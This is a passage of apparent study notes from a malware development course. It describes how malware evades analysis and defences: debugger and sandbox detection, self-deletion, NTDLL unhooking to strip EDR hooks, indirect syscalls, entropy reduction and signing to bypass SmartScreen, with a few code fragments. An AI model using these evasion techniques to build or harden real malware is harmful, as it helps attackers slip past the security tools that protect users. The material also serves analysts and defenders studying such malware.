// mov r10, rcx -> 4C 8B D1
// mov eax, SSN -> B8 XX XX 00 00
// If first byte is 0x4C -> not hooked, extract SSN
// If first byte is 0xE9 or 0xFF -> hooked
typedef struct _SYSCALL_ENTRY {
DWORD dwSSN;
PVOID pSyscallAddr;
} SYSCALL_ENTRY;
// Find unhooked syscall address
// (jmp to syscall; ret instruction in ntdll)
// Used for indirect syscalls
Anti-Analysis
Anti-analysis techniques help malware remain undetected for longer periods, providing additional time to modify code and make it harder to detect. The goal is not to make malware impossible to analyze (which is impossible), but to make the analysis process more time-consuming.
IsDebuggerPresent
The simplest function to detect a debugger. However, directly calling the WinAPI's IsDebuggerPresent is suspicious and can be bypassed using ScyllaHide. A better approach: check PEB.BeingDebugged directly.
// Custom IsDebuggerPresent - check PEB directly
BOOL IsDebuggerPresent2() {
#ifdef _WIN64
PPEB pPeb = (PEB*)(__readgsqword(0x60));
#elif _WIN32
PPEB pPeb = (PEB*)(__readfsdword(0x30));
#endif
return pPeb->BeingDebugged;
}
NtQueryInformationProcess
Use NtQueryInformationProcess with ProcessDebugPort (class 7) to check for a debugger. If it returns a non-zero value, the process is being debugged. This technique is harder to bypass because it queries the kernel object directly.
Hardware Breakpoints Detection
Detect hardware breakpoints by examining the thread context — specifically the debug registers DR0-DR3 (breakpoint addresses) and DR7 (breakpoint controls). If any of DR0-DR3 are non-zero, a debugger has placed hardware breakpoints.
Timing Checks
Use GetTickCount64 or QueryPerformanceCounter to measure time between two points in the code. If the time is abnormally long, a debugger may be single-stepping through the code. Simple but effective technique.
Self-Deletion
Delete the malware's own executable file after it has started running, removing the on-disk artifact. Use DeleteFile combined with MoveFileEx using the MOVEFILE_DELAY_UNTIL_REBOOT flag to mark for deletion on restart, or delete directly by opening the file with FILE_FLAG_DELETE_ON_CLOSE.
Anti-Virtual Environments
Anti-VM techniques help malware detect whether it is running in a virtual machine or sandbox. If a virtual environment is detected, the malware will execute benign code or stop entirely. This is an effective way to avoid analysis by automated sandbox systems (Cuckoo, Any.run, CrowdStrike Sandbox).
Hardware Specs Check
Check hardware specifications: RAM below 4GB, CPU cores below 2, disk size below 60GB — all indicators of a VM. Use GlobalMemoryStatusEx, GetSystemInfo, and GetDiskFreeSpaceExW.
Machine Resolution Check
VMs often use default resolutions (800x600, 1024x768). Check using GetSystemMetrics with SM_CXSCREEN and SM_CYSCREEN.
Filename Check
Some sandboxes name files according to specific patterns (hash, sample, malware). Check the current executable's filename.
Running Processes Check
Check for VM-specific processes: vmtoolsd.exe, vmwaretray.exe, vboxservice.exe, xenservice.exe.
User Interaction Check
Sandboxes typically lack user interaction. Check click counts, idle time, and cursor position. If there is no interaction for an extended period, the malware may be running in a sandbox.
Multiple Delay Execution Techniques
Sandboxes often have timeouts to avoid infinite execution. Use various delay techniques to outlast them: WaitForSingleObject, MsgWaitForMultipleObjectsEx, NtWaitForSingleObject, NtDelayExecution. Each technique has unique characteristics and is harder to patch than a simple Sleep call.
API Hammering
API Hammering is a technique that consumes CPU time by calling ineffective APIs repeatedly. Sandboxes often accelerate time (fast-forward Sleep), but API Hammering forces the sandbox to execute each API call, making the analysis time very long and potentially exceeding the sandbox's timeout.
EDR Bypass & NTDLL Unhooking
EDRs (Endpoint Detection and Response) hook functions in ntdll.dll to monitor API calls. NTDLL Unhooking is a technique that restores the original code of ntdll.dll, removing EDR hooks. There are several unhooking methods:
NTDLL Unhooking from Disk
Read a clean copy of ntdll.dll from disk (C:\Windows\System32\ntdll.dll), compare it with the loaded version in memory, and overwrite the text section of the in-memory version with the clean copy from disk. Use CreateFileW + ReadFile or memory mapping to read the file.
NTDLL Unhooking from KnownDlls Directory
KnownDlls is a special directory in Windows that contains section objects for system DLLs, including ntdll.dll. These section objects contain clean (unhooked) copies of the DLLs. Use NtOpenSection + NtMapViewOfSection to map the clean copy, then copy the text section to the loaded ntdll.dll.
NTDLL Unhooking from Suspended Process
Create a new process in a suspended state (e.g., notepad.exe). This new process has a clean ntdll.dll because EDR hooks DLLs after the process starts (EDR hooks the process after initialization). Map ntdll.dll from the suspended process, copy the text section, and unmap.
NTDLL Unhooking from Web Server
Download a clean copy of ntdll.dll from a remote server, compare and overwrite the text section. This method bypasses all local hooking mechanisms but requires a network connection.
Indirect Syscalls — HellsHall
Direct Syscalls bypass userland hooks but leave a trace: the return address on the stack points to a memory region not belonging to ntdll.dll, which EDR can detect through return address checking. Indirect Syscalls solve this problem by executing the syscall instruction from within ntdll.dll (at a legitimate address), making the return address appear normal.
HellsHall combines Hell's Gate (resolve SSN) and Halos Gate (find unhooked syscall instructions in ntdll) to perform indirect syscalls. The process: find the SSN using the Hell's Gate method, find the address of a syscall; ret instruction within ntdll, and call that address — the return address on the stack will belong to ntdll, bypassing return address checking.
Direct Syscall: The syscall instruction resides in malware code. The return address on the stack points to the malware's memory region → easily detected by return address validation.
Indirect Syscall: The syscall instruction resides in ntdll.dll. The return address on the stack points to an ntdll region → appears like a legitimate function call, harder to detect.
Bypassing AVs
Effectively bypassing AV requires combining multiple techniques discussed in the previous sections. No single technique is sufficient to bypass all security solutions — a multi-layered (reverse defense-in-depth) approach is needed.
Binary Entropy Reduction
Encrypted payloads have high entropy — a suspicious indicator for AV. Entropy reduction techniques: insert legitimate strings, pad with the same byte, remove the CRT library (reduces size), use the EntropyReducer tool. The goal: reduce entropy to a level close to that of a normal binary.
CRT Library Removal
Removing the C Runtime Library significantly reduces binary size and entropy. Replace CRT functions with custom implementations: replace memcpy with a loop, replace printf with WriteConsoleA, etc. Set a custom entry point symbol to avoid needing CRT startup code.
IAT Camouflage
The compiler's dead-code elimination may remove "fake" imports added to disguise the real IAT. Use #pragma comment(linker, "/include:...") or volatile references to force the compiler to retain fake imports.
Block DLL Policy
Block DLL Policy is a technique that prevents EDR DLLs from being loaded into newly created processes. Use PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON flag. Can be applied to both local and remote processes.
References
This research document was compiled and authored based on the Malware Development course by qa210, covering 33 chapters from fundamentals to advanced topics. The content spans the entire MDLC — from basic Windows Architecture, PE Format, and DLL knowledge to advanced techniques like Indirect Syscalls, EDR Bypass, and NTDLL Unhooking.
Additional Topics Covered in the Full Course
| Topic | Description |
|---|---|
Malware Signing | Digitally sign malware to bypass SmartScreen and trust verification |
Payload Execution Control | Use Semaphore, Mutex, and Events to control payload execution flow |
PE Header Analysis | Deep analysis of PE headers: RVAs, Export Table, IAT, Undocumented structures |
Brute Force Decryption | Encrypt keys using custom functions, brute force to decrypt at runtime |
NtCreateUserProcess | Create processes using NTAPI instead of CreateProcess, combined with PPID spoofing and block DLL |
API Hammering | Consume CPU time to outlast sandbox timeouts |
Malware Development course by qa210 — complete material with 33 chapters including theory, code demos, and practice exercises. This document summarizes the key concepts; reading the original material is recommended for a deeper understanding of each technique and hands-on practice with full code examples.